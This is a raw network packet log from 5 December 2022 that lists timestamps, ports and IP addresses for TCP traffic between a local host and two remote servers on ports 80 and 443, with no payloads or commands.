Dec 5, 2022 01:32:37.985557079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985574007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985574961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985590935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985614061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985713959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985732079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985748053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985764027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985768080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985781908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985795975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985797882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985819101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985903025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985935926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985937119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985955954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985972881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985989094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986006021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986006021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986022949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986032009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986040115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986057997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986063957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986074924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986092091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986097097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986109972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986125946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986134052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986144066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986159086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986175060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986176968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986192942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986203909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986210108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986227036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986232042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986243963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986260891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986262083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986278057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986294985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986299038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986311913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986324072 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986329079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986346960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986361980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986376047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986386061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986403942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986577034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986633062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986823082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986840963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986855984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986871958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986897945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986898899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986917973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.986923933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.986958027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987025023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987047911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987062931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987078905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987082005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987097979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987113953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987119913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987132072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987148046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987148046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987168074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987183094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987200022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987201929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987216949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987226963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987234116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987251043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987257004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987268925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987284899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987291098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987301111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987318039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987327099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987334967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987356901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987390041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987795115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987811089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.987833977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.987859011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988173008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988214970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988255024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988255978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988300085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988341093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988378048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988382101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988418102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988424063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988465071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988506079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988543987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988545895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988588095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988589048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988605976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988624096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988641024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988656044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988656998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988687038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.988699913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988717079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.988733053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989022017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989062071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989101887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989131927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989168882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989168882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989222050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989260912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989301920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989314079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989331961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989353895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989382982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989401102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989417076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989422083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989434958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989469051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989721060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989756107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989758968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989903927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989921093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989952087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.989955902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989985943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.989998102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990015030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990031004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990060091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990067959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990082979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990093946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990102053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990118980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990134954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990149975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990154982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990166903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990183115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990185022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990200996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990209103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990219116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990236044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990246058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990252972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990269899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990283966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990287066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990303993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990310907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990320921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990339041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990348101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990355968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990372896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990391016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990407944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990423918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990425110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990441084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990458012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990468025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990474939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990492105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990493059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990509033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990525961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990536928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990541935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990559101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990575075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990581989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990592003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990601063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990609884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990626097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990627050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990645885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990652084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990684032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990685940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990701914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990717888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990734100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990745068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990750074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990767002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990773916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990784883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990802050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990806103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990819931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990835905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990842104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990853071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990868092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990870953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990896940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990912914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990930080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990935087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990942955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.990956068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.990988970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:38.001918077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:38.004379034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:43.317965984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:43.335585117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:43.335689068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:43.434155941 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.434221983 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.434309006 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.477133989 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.477191925 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.531862020 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.531996012 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.534809113 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.534846067 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.535286903 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.659101009 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.813904047 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.813965082 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853420019 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853591919 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853674889 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853709936 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.853755951 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853838921 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853908062 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.853924036 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853950977 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.853971958 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.854091883 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854175091 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854238033 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.854253054 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854276896 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854504108 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.854530096 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854585886 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.854767084 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854927063 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.854995966 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.855012894 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.855604887 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.855683088 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.855691910 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.855715036 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.856260061 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.856319904 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.856337070 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.856385946 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.856399059 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.856470108 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.857065916 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.857126951 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.857144117 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.857192039 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.857203960 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.857275009 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.857692003 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.857707977 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.857897997 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.858716011 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.858733892 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.870284081 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.870369911 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.870371103 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.870397091 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.870487928 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.870503902 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.870980024 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.871051073 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.871073961 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.871095896 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.871226072 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.871282101 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.871301889 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.871352911 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.871800900 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.872047901 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.872108936 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.872126102 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.872818947 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.872909069 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.872924089 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.873610973 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.873688936 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.873694897 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.873718023 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.873749018 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.874444008 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.874521971 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.874536991 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.874589920 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.875262976 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.875349998 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.875941038 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.876023054 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.876730919 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.876822948 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.877005100 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.877113104 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.877769947 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.877856016 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.878614902 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.878681898 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.878701925 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.878767967 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.887095928 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.887178898 CET	49706	443	192.168.2.3	162.159.129.233
Dec 5, 2022 01:32:43.887228966 CET	443	49706	162.159.129.233	192.168.2.3
Dec 5, 2022 01:32:43.887310982 CET	49706	443	192.168.2.3	162.159.129.233
